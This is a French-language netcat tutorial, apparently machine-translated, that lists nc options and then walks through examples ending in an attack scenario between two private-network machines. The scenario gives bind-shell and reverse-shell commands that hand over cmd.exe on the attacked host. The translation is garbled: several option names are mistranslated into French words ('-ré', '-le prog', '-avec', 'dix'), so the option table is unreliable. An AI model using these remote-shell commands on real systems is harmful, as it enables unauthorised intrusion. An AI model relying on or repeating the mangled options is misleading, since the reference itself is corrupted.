NC est l'abréviation de netcat et est connu sous le nom de «couteau suisse» dans le monde de la sécurité des réseaux. Il utilise le protocole TCP ou UDP pour se connecter et lire des données. Il est conçu comme un outil de porte dérobée stable qui peut être facilement piloté directement par d'autres programmes et scripts. En même temps, c'est aussi un puissant outil de débogage et de détection de réseau qui peut établir presque tous les types de connexions réseau nécessaires
nc [-options] nom d'hôte port [s] [ports]…
Numéro de série | Code | Effet |
---|---|---|
01 | -ré | Courir en arrière-plan |
02 | -le prog | La redirection de programme, une fois connectée, exécute le programme lié (plus dangereux) |
03 | -g | Point de saut de routage source, pas plus de huit fois |
04 | -G | Indicateurs de routage source 4, 8, 12, ... |
05 | -h | Informations d'aide |
06 | -i secondes | Réglage du temps de retard, utilisé pendant l'analyse du port |
07 | -l | Mode surveillance, en attente de connexion. Une fois la connexion établie, la surveillance se termine |
08 | -L | Mode surveillance, en attente de connexion. Une fois la connexion établie, continuez à surveiller |
09 | -n | Adresse IP sous forme numérique |
dix | -o fichier | Spécifiez le code hexadécimal à transmettre |
11 | -P port | Spécifiez le numéro de port local |
12 | -r | Spécifiez au hasard le 0 local ou le numéro de port distant |
13 | -s addr | Adresse source locale |
14 | -t | Répondre aux demandes entrantes en tant que telnet |
15 | -u | Méthode UDP |
16 | -v | Afficher les détails |
17 | -w | Spécifiez le délai |
18 | -avec | Mode E / S, utilisé pendant la numérisation |
Tels que:
1. Appliquer http / 1.1 appliquer la méthode GET
- Copiez la commande nc à la racine du lecteur c
- Entrer en mode dos et se retirer à la racine
- Type nc -l -p 80: surveiller l'entrée du port 80
- Entrez l'adresse IP de cette machine ou 127.0.0.1 pour utiliser le port 80
2. Connectez-vous au port 80
- Entrez dos et retraite à suivre
- Type nc -l -p 80: surveiller l'entrée du port 80
- Ouvrez ensuite un dos telnet local IP 80 ou 127.0.0.1 80 pour afficher la liaison
3. Analysez
l'état ouvert de tous les ports 80 à 445 de l'hôte distant 192.168.0.103
Format: nc -nvv -w2 -z 192.168.0.103 80-445
4. Connexion directe: attaquez la machine 192.168.0.100, attaquez la machine 192.168.0.103
Tâche: connectez la machine attaquante 192.168.0.100 à la machine attaquée 192.168.0.103 via le port 80 et faites fonctionner le lecteur C de la machine attaquée en temps réel.
Étape 1 Liez le shell au port 80 sur la machine attaquée 192.168.0.103.
Format: nc -vv –l –p 80 –e cmd.exe
Étape 2 L'attaquant 192.168.0.100 se connecte à l'hôte 192.168.0.103 via le port 80 et obtient le shell de l'hôte distant.
Format: formation nc 192.168.0.103 80
5 Connexion inverse: machine attaquante 192.168.0.100, machine attaquée 192.168.0.103
Tâche: connexion inverse de la machine attaquante 192.168.0.100 à la machine attaquée 192.168.0.103 via le port 8080 Et le fonctionnement en temps réel du lecteur C de la machine attaquée.
Étape 1 L'attaquant 192.168.0.100 surveille son port 8080.
Format: nc -vv –l –p 8080
Étape 2 La machine attaquée 192.168.0.103 lie le shell au port 8080 de l'attaquant, afin que l'attaquant obtienne inversement le shell de la machine attaquée.
Format: nc –e cmd.exe 192.168.0.100 8080